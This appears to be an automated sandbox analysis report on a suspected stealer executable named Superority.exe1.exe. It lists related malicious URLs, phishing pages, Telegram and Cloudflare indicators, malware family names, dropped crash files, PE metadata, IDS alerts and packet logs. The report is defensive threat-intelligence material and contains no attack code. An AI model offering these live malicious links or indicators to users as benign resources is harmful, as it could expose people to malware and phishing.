149.154.167.99	http://45.142.208.144.sslip.io/blog/	Get hash	malicious	Unknown	Browse	telegram.org/img/emoji/40/F09F9889.png
	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	ResPencil.5.6.1.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	ALfzrNn09x.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	EasyWay.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	Aura.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	EasyWay.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	Aura.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	SecuriteInfo.com.Trojan.PWS.Lumma.1819.11767.23234.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	SwitchAutoSetup_v0.7.0.3.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	KMSpico.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	KMSpico.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
astralconnec.icu	EasyWay.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.205.192
	Aura.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.77.86
	EasyWay.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.205.192
	Aura.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.205.192

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	tnyg2PUsAn.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	sNtelKBdvr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	B599ZYjsg4.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	LdksctiMff.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	gcXBQbWQ1p.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	lBRZwn7j6P.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ResPencil.5.6.1.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	KQfgqxs3In.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUo9fr3nQW.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#jake.totam@southwark.anglican.org	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
CLOUDFLARENETUS	Direct Deposit Confirmations#90939 josh.bezemer.svg	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://kenahexo.muvemisavo.com	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://wildlifemgt.live	Get hash	malicious	Unknown	Browse	104.18.11.207
	https://assets-fra.mkt.dynamics.com/b3baa109-6efd-ef11-b016-002248d9b9fa/digitalassets/standaloneforms/fe7058e5-a1fd-ef11-bae3-000d3a959714#_msdynmkt_donottrack=0,_msdynmkt_linkid=37db13e4-8bf7-4e91-a0fa-9dd02c9e6ee4	Get hash	malicious	HTMLPhisher	Browse	172.67.220.6
	Ontbrekende urenstaat.html	Get hash	malicious	Unknown	Browse	188.114.96.3
	Emma Sparkes_cmrdpkuyjxetud.html	Get hash	malicious	HTMLPhisher	Browse	162.159.140.229
	https://publizr.com/alliedcon/allied-construction	Get hash	malicious	Gabagool	Browse	172.67.143.150
	sNtelKBdvr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	rgk62zzDVd.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.96.1
	https://publizr.com/alliedcon/allied-construction	Get hash	malicious	Gabagool	Browse	172.67.74.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	tnyg2PUsAn.exe	Get hash	malicious	Unknown	Browse	104.21.77.86 149.154.167.99
	StrikeLeague_Setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.77.86 149.154.167.99
	wanscam software ocx setup download.exe	Get hash	malicious	Unknown	Browse	104.21.77.86 149.154.167.99
	wanscam software ocx setup download.exe	Get hash	malicious	Unknown	Browse	104.21.77.86 149.154.167.99
	PastePictures 1.xla	Get hash	malicious	Unknown	Browse	104.21.77.86 149.154.167.99
	PastePictures 1.xla	Get hash	malicious	Unknown	Browse	104.21.77.86 149.154.167.99
	ALfzrNn09x.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.77.86 149.154.167.99
	Purchase Inquiry.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.77.86 149.154.167.99
	POETDB24-25771.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.77.86 149.154.167.99
	POETDB24-25771.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.77.86 149.154.167.99

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Superority.exe1._69e57c9baf157eda2fe7e9bacb6e4947ee2fcc1f_96223681_7b5ef16b-fc02-411d-9bae-0dea8fce227e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8685509801041308
Encrypted:	false
SSDEEP:	96:p0jFJCUnKJrlYsygtojTOAqyS3QXIDcQlc6VcEdcw3XYBYz+BHUHZ0ownOgHkEwZ:qjzzEZY0vA0LR30aeSzuiFgZ24IO85
MD5:	EAF1E5929C14F76525EF57EEA94FB5FD
SHA1:	97AA2A8E719C8586662938FDF3C6E770536D2563
SHA-256:	EA4E3A76D11A6BCBF44A2C25A4130A800A64B19F1F64704ECA8447467E33394D
SHA-512:	0064853443ED9DCE3D8C66E5EF732A029DFCE014F7F9AE8D6CE07CB67FDF139CFD00C3C70DA3ADD5467113025951231F3BA7E2698C2457FB281F746873BC78FA
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.0.9.0.6.6.5.1.8.9.3.2.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.0.9.0.6.6.5.7.2.0.5.5.6.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.5.e.f.1.6.b.-.f.c.0.2.-.4.1.1.d.-.9.b.a.e.-.0.d.e.a.8.f.c.e.2.2.7.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.f.1.7.e.9.0.-.a.e.8.b.-.4.8.9.7.-.a.a.7.c.-.0.8.e.7.e.7.a.e.e.7.4.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.u.p.e.r.o.r.i.t.y...e.x.e.1...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.r.t.a.l.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.7.0.-.0.0.0.1.-.0.0.1.8.-.8.a.8.e.-.7.5.0.c.c.9.9.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.d.c.7.a.7.7.b.0.8.0.2.3.d.f.f.4.1.3.b.c.4.e.a.5.1.a.2.5.5.6.3.0.0.0.0.0.0.0.0.!.0.0.0.0.b.7.0.f.9.1.d.f.0.4.6.a.e.7.2.e.3.7.d.d.a.e.1.b.8.5.5.6.3.4.e.b.3.2.d.6.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB259.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Mar 10 14:31:05 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	162089
Entropy (8bit):	3.6498804105129703
Encrypted:	false
SSDEEP:	1536:dfZM78G5CDDeuBojRypN4uE2aOXJjLTghwAh7W8tT44:dRxBDGU4uEq5jLTghns
MD5:	8A28E0F2F77D9B375B5C94F58786B280
SHA1:	6A412AB386EE0A428406260BBF00CE64C558BFAC
SHA-256:	A2954EB5A823210C28838730CEE46D6B99B12B3B218FBF758197D240239EDFD1
SHA-512:	81A06ACE90FC56905E21AEA3C58B9F972B2C6774E2E8F8164DB580F473A21B66E7D2B42DD5097B353EA0E6BA613D0630DF904A75D24CE183CA451DB0F2B1F627
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........g............$...............8.......$...(............0..........`.......8...........T............ ...Y..........L...........8...............................................................................eJ..............GenuineIntel............T.......p......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB392.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8416
Entropy (8bit):	3.689345820200387
Encrypted:	false
SSDEEP:	192:R6l7wVeJdY6FO6Y+sSU95LgmfzVJnprr89b3HsfiA9m:R6lXJy6c6YlSU9VgmfzVJm3MfiX
MD5:	ED1DC82EBFD45923BFB183F51209F4B6
SHA1:	B634EF58D887794FB591A596B6575C0FFCF76E89
SHA-256:	1D05C781186EF53D892453F93B6A8C595F761F1AD44D29C71A340C4DA57996BA
SHA-512:	FD619E2A8194604C9C6113E3BF1553B2A9ED6B1AD7B7A81437A3D9B97B181354D44A16B124627538BC688D94873B89ACA5AFE56EEEAF597328CA72C96BFD6FA8
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.4.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB3D2.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4775
Entropy (8bit):	4.457882858677097
Encrypted:	false
SSDEEP:	48:cvIwWl8zs+Jg77aI9t/mWpW8VYFYm8M4JQdxPcf6FH1P+q8vcdxPcfDv2j8Azrbi:uIjf0I7D/n7VdJhfERKNfLERzrb5pgd
MD5:	5D4ABACD5E833AA416F03223B1C22012
SHA1:	EB30A8D6B9B3B1EFF9100DB153833D088A6B35E0
SHA-256:	1683B5B438DAF7A475AC4EA166F27F7F2CDCBD1A07A2F8F609C35C7E1AF44CD2
SHA-512:	667CA4988B3285F6F486CB278ABC5C63DC52D77662A7BC33FC21A57771EFE17F41AF722E5565204C351271AD4AAD669605A2C97A6FEA16E42573148CFDF34491
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="754893" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421456790779818
Encrypted:	false
SSDEEP:	6144:M+ifpi6ceLPL9skLmb0mYSWSPtaJG8nAgexk8tq2QqZaKqFIeC/7ocX2tA:fi58YSWIZLI2QqYwj1mC
MD5:	6729A0D73062EAC016F074A85C04C28B
SHA1:	E267004CF11E5F6A5850CC95BD721DFEEC179751
SHA-256:	BCD925657FD5342DDFA6E2FC997A9CB791F2EC34C43DFF173980E7E8EB174D1C
SHA-512:	9FA2AD1BAE6DB2D494D647DE3587C6462045CA1CEB2118A05098C86FE9EE1BE5B568CBF2270EA1C2DBBD78FB4BF4F81203CCC6B01DCA7EF47EA99FCD6CD3A9F9
Malicious:	false
Reputation:	low
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....d...............................................................................................................................................................................................................................................................................................................................................Xi..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	4.394747702855989
Encrypted:	false
SSDEEP:	768:104DoyFMRJmG6L/rNy2BC32cXsN/HVi9QlCdr+X7bs9NYrw:10tsTMgm9GNIQlIaB
MD5:	B2F320D13C5F5D67A14F333B31F914D4
SHA1:	D30F787C657181E652C72A153037DD695C5A7E56
SHA-256:	55DA654194C26173A68C00624609F3F9B8BD7ABEE0DEA2BD375D5F5C33958D72
SHA-512:	71441DBC478D24BBFF8BBB63DE031D8F4724FD0B7D12010B7F4B729D11B282214A66ECD12F7B29A6A2BAE79CB80BA46D24902C036C29BA057D12690EAD44F76A
Malicious:	false
Reputation:	low
Preview:	regfG...G....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....d...............................................................................................................................................................................................................................................................................................................................................^i..HvLE........G...........@.S.j...z..Q......................... ...@... ...p... ..hbin.................\.Z............nk,..\.Z....................h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........N...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	0.16441873246285094
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Superority.exe1.exe
File size:	37'082'112 bytes
MD5:	56ec4fe0d12094a8750b70b3a0bf54be
SHA1:	f010c27c7ba7083d71a9c4451bec9588e22ed72a
SHA256:	99ee408c7116fc4d9416be5248874cf6397b6c65e42a035afcd4f8ad59705303
SHA512:	b0bc4115d51ba89e423d5276096972e90e17d1eb0a57695a741209b85ff392cc3f1c6140b08089fb7c4c9ac9e4d8a8cc3ec2cf7e9aa8763d4b0d94fc1f5cb7bd
SSDEEP:	12288:1g/MBd+7aFYIQiEgNC5IeH7c3NVzYz1N2OSrP9B:WMBY7oYntP5IeH8tYH2trr
TLSH:	3E872314EAC485A2D1A98BBF425703A1F570D2127EC3F69F209D3F61CB83B914A32D6D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q............"...0.."..........f;... ...`....@.. .......................`............`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x403b66
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xADFF511F [Mon Jul 3 22:20:15 2062 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
push es
js 00007F9CBCF7767Dh
or al, 24h
add eax, 15110704h
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
pop esp
jns 00007643h
jno 00007F9CBCF7772Ah
aam C8h
outsd
and eax, 4C604532h
jmp far 5164h : 62FDD060h
mov dword ptr [esi], ebx
xor byte ptr [ebx+7BBFA4B8h], ah
aam 4Ah
ret
jnbe 00007F9CBCF776E6h
add al, 3Dh
add byte ptr [eax], al
add byte ptr [eax], al
jns 00007F9CBCF77712h
lea edx, dword ptr [eax]
loope 00007F9CBCF776ABh
sti
jne 00007F9CBCF776C3h
or esp, dword ptr [ecx]
adc esi, ebp
cmpsd
in al, 03h
mov bh, A3h
cmpsb
and dword ptr [eax], esp
test esi, esp
cwde
push edx
jmp 00007F9C6B24B7C1h
sub dword ptr [edx+325E6BADh], esp
adc dword ptr [ebx], esp
lodsd
rcl dword ptr [eax-35h], FFFFFFDCh
sub ah, byte ptr [ebx]
inc ebx
jnc 00007F9CBCF776FBh
jbe 00007F9CBCF77727h
cmp dword ptr [ebp-00874B27h], esi
push eax
and ah, byte ptr [ecx+03FCEF36h]
hlt
xchg eax, edi
int3
scasb
add eax, A99A6234h
aam 6Fh
mov edx, 0A561172h
mov al, C7h
pop ds
cmp esp, ebx
fdivr qword ptr [edi]
or bl, byte ptr [ebp-5Eh]
shl al, FFFFFFBFh
mov eax, 926A3B5Eh
add byte ptr [ecx], 00000069h
pop eax
stosb

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3b14	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6000	0x59c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a80	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x20f8	0x2200	2336fc02d84ab7fe67bf872f8511b001	False	0.7184053308823529	data	6.597846647424806	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x6000	0x59c	0x600	88026805aec0496128e320c861c25c4f	False	0.41015625	data	4.0305393073644025	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8000	0xc	0x200	fe25fe59d6526d5530f0d4f3420107c5	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.CSS	0xa000	0x5a600	0x5a600	98e4e4605120c2cb709630879ecb5f06	False	1.0003268715421854	data	7.999586089466254	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x6090	0x30c	data			0.4217948717948718
RT_MANIFEST	0x63ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments
CompanyName
FileDescription	Portals
FileVersion	1.0.0.0
InternalName	Portals.exe
LegalCopyright	Copyright 2025
LegalTrademarks
OriginalFilename	Portals.exe
ProductName	Portals
ProductVersion	1.0.0.0
Assembly Version	1.0.0.0

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-10T15:31:07.705334+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49686	149.154.167.99	443	TCP
2025-03-10T15:31:10.298423+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49688	104.21.77.86	443	TCP
2025-03-10T15:31:14.197756+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49690	104.21.77.86	443	TCP
2025-03-10T15:31:37.362043+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49696	104.21.77.86	443	TCP
2025-03-10T15:31:40.516358+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49697	104.21.77.86	443	TCP
2025-03-10T15:31:44.094027+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49699	104.21.77.86	443	TCP
2025-03-10T15:31:47.557755+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49700	104.21.77.86	443	TCP
2025-03-10T15:32:11.432611+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49701	104.21.77.86	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 10, 2025 15:31:05.436335087 CET	49686	443	192.168.2.7	149.154.167.99
Mar 10, 2025 15:31:05.436391115 CET	443	49686	149.154.167.99	192.168.2.7
Mar 10, 2025 15:31:05.436490059 CET	49686	443	192.168.2.7	149.154.167.99
Mar 10, 2025 15:31:05.439495087 CET	49686	443	192.168.2.7	149.154.167.99
Mar 10, 2025 15:31:05.439508915 CET	443	49686	149.154.167.99	192.168.2.7
Mar 10, 2025 15:31:07.704570055 CET	443	49686	149.154.167.99	192.168.2.7
Mar 10, 2025 15:31:07.705333948 CET	49686	443	192.168.2.7	149.154.167.99
Mar 10, 2025 15:31:07.710628986 CET	49686	443	192.168.2.7	149.154.167.99
Mar 10, 2025 15:31:07.710642099 CET	443	49686	149.154.167.99	192.168.2.7
Mar 10, 2025 15:31:07.710927010 CET	443	49686	149.154.167.99	192.168.2.7
Mar 10, 2025 15:31:07.752727985 CET	49686	443	192.168.2.7	149.154.167.99
Mar 10, 2025 15:31:07.780343056 CET	49686	443	192.168.2.7	149.154.167.99
Mar 10, 2025 15:31:07.824331999 CET	443	49686	149.154.167.99	192.168.2.7
Mar 10, 2025 15:31:08.415595055 CET	443	49686	149.154.167.99	192.168.2.7
Mar 10, 2025 15:31:08.415625095 CET	443	49686	149.154.167.99	192.168.2.7
Mar 10, 2025 15:31:08.415635109 CET	443	49686	149.154.167.99	192.168.2.7
Mar 10, 2025 15:31:08.415690899 CET	443	49686	149.154.167.99	192.168.2.7
Mar 10, 2025 15:31:08.415718079 CET	443	49686	149.154.167.99	192.168.2.7
Mar 10, 2025 15:31:08.415747881 CET	49686	443	192.168.2.7	149.154.167.99
Mar 10, 2025 15:31:08.415803909 CET	49686	443	192.168.2.7	149.154.167.99
Mar 10, 2025 15:31:08.476675987 CET	49686	443	192.168.2.7	149.154.167.99
Mar 10, 2025 15:31:08.476711035 CET	443	49686	149.154.167.99	192.168.2.7
Mar 10, 2025 15:31:08.476723909 CET	49686	443	192.168.2.7	149.154.167.99
Mar 10, 2025 15:31:08.476731062 CET	443	49686	149.154.167.99	192.168.2.7
Mar 10, 2025 15:31:08.566956997 CET	49688	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:08.566997051 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:08.567099094 CET	49688	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:08.571857929 CET	49688	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:08.571873903 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:10.298049927 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:10.298423052 CET	49688	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:10.300234079 CET	49688	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:10.300241947 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:10.300501108 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:10.301920891 CET	49688	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:10.301920891 CET	49688	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:10.301990032 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:11.130794048 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:11.136703014 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:11.136749029 CET	49688	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:11.136759043 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:11.136781931 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:11.136821985 CET	49688	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:11.136828899 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:11.160785913 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:11.160871029 CET	49688	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:11.160903931 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:11.165823936 CET	443	49688	104.21.77.86	192.168.2.7
